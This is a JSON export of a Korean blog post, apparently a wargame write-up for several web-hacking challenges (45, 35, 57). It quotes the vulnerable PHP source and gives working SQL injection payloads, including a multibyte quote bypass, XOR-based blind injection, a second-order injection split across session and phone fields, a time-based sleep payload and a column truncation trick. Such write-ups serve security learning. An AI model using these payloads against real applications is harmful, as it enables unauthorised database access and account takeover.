45\ubc88 \ubb38\uc81c\uc758 \uc18c\uc2a4\ub2e4<\/p>\n
$_GET[id]=mb_convert_encoding($_GET[id],’utf-8′,’euc-kr’);<\/p>\n
$data=@mysql_fetch_array(mysql_query(“select id from members where id=’$_GET[id]’ and pw=md5(‘$_GET[pw]’)”));<\/p>\n
if(eregi(“admin”,$_GET[id])) exit();
\nif(eregi(“from”,$_GET[id])) exit();
\nif(eregi(“union”,$_GET[id])) exit();
\nif(eregi(“limit”,$_GET[id])) exit();
\nif(eregi(“union”,$_GET[pw])) exit();
\nif(eregi(“pw”,$_GET[pw])) exit();
\nif(eregi(“=”,$_GET[pw])) exit();
\nif(eregi(“>”,$_GET[pw])) exit();
\nif(eregi(“<\",$_GET[pw])) exit();\n\npw\uc5d0\ub294 from, select \ub97c \uc548\ub9c9\uc558\ub2e4\n\nid\uc5d0\uc11c \uc2f1\uae00\ucffc\ud130 \uc0ac\uc6a9 \uac00\ub2a5\ud558\ub2c8\uae4c\n\na%aa'\/* \uc8fc\uace0 pw\uc5d0 *\/ \uc8fc\uba74\n\nid='a%aa'\/*' and pw=md5('*\/')\n\n\uc77c\ucf00 \ub41c\ub2e4.\n\n=, >, < \uac00 \ud544\ud130\ub9c1\ub418\uc5c8\uc73c\ub2c8 xor \uc5f0\uc0b0\uc790\ub97c \uc0ac\uc6a9\ud574\uc11c\n\n*\/or ((select count(table_name) from information_schema.tables where table_type like 0x42415345205441424C45) between 1 and 72)^1 like 0#\n\n*\/or ((select count(table_name) from information_schema.tables where table_type like 0x42415345205441424C45) between 1 and 73)^1 like 0#\n\n\uc774\ub807\uac8c \uacf5\uaca9\ud574\uc11c \ud14c\uc774\ube14 \uac2f\uc218\uac00 73\uac1c\ub780\uac78 \uc54c\uc544\ub0c8\ub2e4.\n\n\uadf8\ub4a4\ub294 \ub611\uac19\uc73c\ub2c8 \uc0dd\ub7b5\n\n=========================================================================\n\n35\ubc88\ubb38\uc81c\ubcf4\uba74\n\nif(eregi(\"%|\\*|\/|=|from|select|x|-|#|\\(\\(\",$_GET[phone])) exit(\"no hack\");\n\n@mysql_query(\"insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone])\") or die(\"query error\");\necho(\"Done
“);<\/p>\n
\uc694\ub798 \ub418\uc5b4\uc788\uc74c.<\/p>\n
\uc6f9\ucf00\uc54c\uc740 magic_quotes_gpc = on \uc774\ub77c \uc6b0\ub9ac\uac00 asdf’ \ub77c\ub294 \uc544\uc774\ub514\ub85c \ub85c\uadf8\uc778\ud558\uba74 asdf’\uac00 \uadf8\ub300\ub85c $_SESSION[id]\uc5d0 \ubc15\ud798<\/p>\n
\uadf8\ub798\uc11c \uc5ec\uae30\uc11c indirect \ub85c \ud544\ud130\uc5c6\ub294 sqli\uac00 \uac00\ub2a5\ud568<\/p>\n
‘,’\ub0b4ip’,(select 1 from \uc778\ud3ec\uc2a4\ud0a4\ub9c8 \uc5b4\uca4c\uad6c\uc800\uca4c\uad6c))# \uc774\ub7f0\uac78\ub85c \uac00\uc785, \ub85c\uae34\ud574\ubd04<\/p>\n
\uadfc\ub370 \ub85c\uae34\uc774 \uc548\ub428<\/p>\n
\uc54c\uace0\ubcf4\ub2c8 \uc6f9\ucf00\uc54c \ud68c\uc6d0\ud14c\uc774\ube14\uc758 \uc544\uc774\ub514 \uce7c\ub7fc max length\uac00 40\uc784 (\ud55c\ub540\ud55c\ub540 \ud14c\uc2a4\ud2b8\ud574\uc11c \uc54c\uc544\ub0c4)<\/p>\n
\ucffc\ub9ac \uc870\uc791\uc744 \uc704\ud574 \uae30\ubcf8\uc801\uc73c\ub85c \ud544\uc694\ud55c\uac8c 20\ubc14\uc774\ud2b8 \ub118\uc73c\ub2c8\uae4c \ub0a8\uc740 20\ub3c4 \uc548\ub418\ub294 \ubc14\uc774\ud2b8\ub85c \uc778\ud3ec\uc2a4\ud0a4\ub9c8 select \ud558\ub294\uac74 \ub3c4\uc800\ud788 \ubd88\uac00\ub2a5<\/p>\n
\uc798 \uc0dd\uac01\ud574\ubcf4\ub2c8 phone\uc5d0\uc11c \ud544\ud130\ub41c\uac74 from, select \uc815\ub3c4\uac00 \ub2e4\uc784<\/p>\n
$_SESSION[id]\uc5d0\uc11c select, from \uc0ac\uc6a9\ud574\uc8fc\uace0 phone\uc5d0\uc11c \ub098\uba38\uc9c0 \uacf5\uaca9 \uc218\ud589\ud558\uba74 \ub428<\/p>\n
\uadfc\ub370 phone\uc5d0\uc11c \uc8fc\uc11d\uc774 \ub2e4 \ub9c9\ud78c\uc9c0\ub77c \uc6d0\ub798 \ub0b4 ip\uc8fc\uc18c \ub4dc\uac00\ub294\ubd80\ubd84 \ucc98\ub9ac\ud558\uae30\uac00 \uace4\ub780\ud568<\/p>\n
\uc544\uc774\ub514\uc5d0 # \uc548\ub9c9\ud600\uc788\uc73c\ub2c8 #\uc73c\ub85c \ucb49 \uc8fc\uc11d\ucc98\ub9ac\ud558\uace0 phone\uc5d0\uc11c \uac1c\ud589\ubb38\uc790\ub85c \uc8fc\uc11d \ub05d\ub0b4\uace0 \uacf5\uaca9 \uc9c4\ud589\ud558\ubbc4 \uae54\ub054\ud574\uc9d0<\/p>\n
‘,’\ub0b4ip’,(select 1 from# \uc694\uac78\ub85c \uac00\uc785\ud574\uc8fc\uace0 \ub4a4\uc5d0 phone \uc5d0\ub2e4\uac00 %0ainformation_schema.tables where 0) \ub123\uc73c\ub2c8<\/p>\n
insert into challenge35_list(id,ip,phone) values(”,’\ub0b4ip’,(select(1)from#’,’\ub0b4ip’,%0ainformation_schema.tables where 0)) \uc774\ub807\uac8c \ub418\ubbc4\uc11c \uacf5\uaca9\uc131\uacf5<\/p>\n
=========================================================================<\/p>\n
57\ubc88\ub3c4 \uceec\ub7fc \uac2f\uc218\ub9cc \ud558\ub098 \ub2e4\ub97c\ubfd0 \ub611\uac19\uc774 \ud130\uc9d0.<\/p>\n
if(eregi(“from|union|select|and|or|not|&|\\||benchmark”,$_GET[se])) exit(“Access Denied”);<\/p>\n
mysql_query(“insert into challenge57msg(id,msg,pw,op) values(‘$_SESSION[id]’,’$_GET[msg]’,’$secret_key’,$_GET[se])”);<\/p>\n
=========================================================================<\/p>\n
$_GET[id]=mb_convert_encoding($_GET[id],’utf-8′,’euc-kr’);<\/p>\n
$data=@mysql_fetch_array(mysql_query(“select id from members where id=’$_GET[id]’ and pw=md5(‘$_GET[pw]’)”));<\/p>\n
if(eregi(“admin”,$_GET[id])) exit();
\nif(eregi(“from”,$_GET[id])) exit();
\nif(eregi(“union”,$_GET[id])) exit();
\nif(eregi(“limit”,$_GET[id])) exit();
\nif(eregi(“union”,$_GET[pw])) exit();
\nif(eregi(“pw”,$_GET[pw])) exit();
\nif(eregi(“=”,$_GET[pw])) exit();
\nif(eregi(“>”,$_GET[pw])) exit();
\nif(eregi(“<\",$_GET[pw])) exit();\nif(eregi(\"from\",$_GET[pw])) exit();\n\n45\ubc88\uc778\ub370 \ud544\ud130 \ubaa9\ub85d\uc740 \uc88b\uc74c\n\n\uadfc\ub370 \ucffc\ub9ac\ub97c \ub0a0\ub9ac\uace0\ub098\uc11c \ud544\ud130\ub97c \ud568\u314b\n\n\ud544\ud130\ub97c \ub2f9\ud574\uc11c exit\uc774 \ub418\uac74\ub9d0\uac74 time based\ub85c blind sqli \uac00\ub2a5\n\nid=%aa%27union%20select%20sleep(0.03)%20from%20information_schema.tables%20where%201=1%23\n\n\uc740\uadfc \ud754\ud55c \uc2e4\uc218\n\n=========================================================================\n\ncolumn truncation attack\ub428\n\n\ud68c\uc6d0\ud14c\uc774\ube14 \uc544\uc774\ub514\uce7c\ub7fc maxlength\uac00 40\uc774\uc600\uc73c\ub2c8 \"oldzombie 1\" (41\uae00\uc790) \ub85c \uac00\uc785 \ud6c4 oldzombie \ub85c \ub85c\uae34\ud558\uba74 \uc77c\ubd80 \uae30\ub2a5 \uad00\ub9ac\uc790\uaec4\ub85c \uc0ac\uc6a9\uac00\ub2a5 - \uba54\uc138\uc9c0, \uba54\ubaa8\ub4f1 \uc5f4\ub78c\ub428\n<\/p>\n","protected":false},"excerpt":{"rendered":"
45\ubc88 \ubb38\uc81c\uc758 \uc18c\uc2a4\ub2e4 $_GET[id]=mb_convert_encoding($_GET[id],’utf-8′,’euc-kr’); $data=@mysql_fetch_array(mysql_query(“select id from members where id=’$_GET[id]’ and pw=md5(‘$_GET[pw]’)”)); if(eregi(“admin”,$_GET[id])) exit(); if(eregi(“from”,$_GET[id])) exit(); if(eregi(“union”,$_GET[id])) exit(); if(eregi(“limit”,$_GET[id])) exit(); if(eregi(“union”,$_GET[pw])) exit(); if(eregi(“pw”,$_GET[pw])) exit(); if(eregi(“=”,$_GET[pw])) exit(); if(eregi(“>”,$_GET[pw])) exit(); if(eregi(“”,$_GET[pw])) exit(); if(eregi(“<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/72"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=72"}],"version-history":[{"count":2,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/72\/revisions"}],"predecessor-version":[{"id":74,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/72\/revisions\/74"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=72"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=72"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=72"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}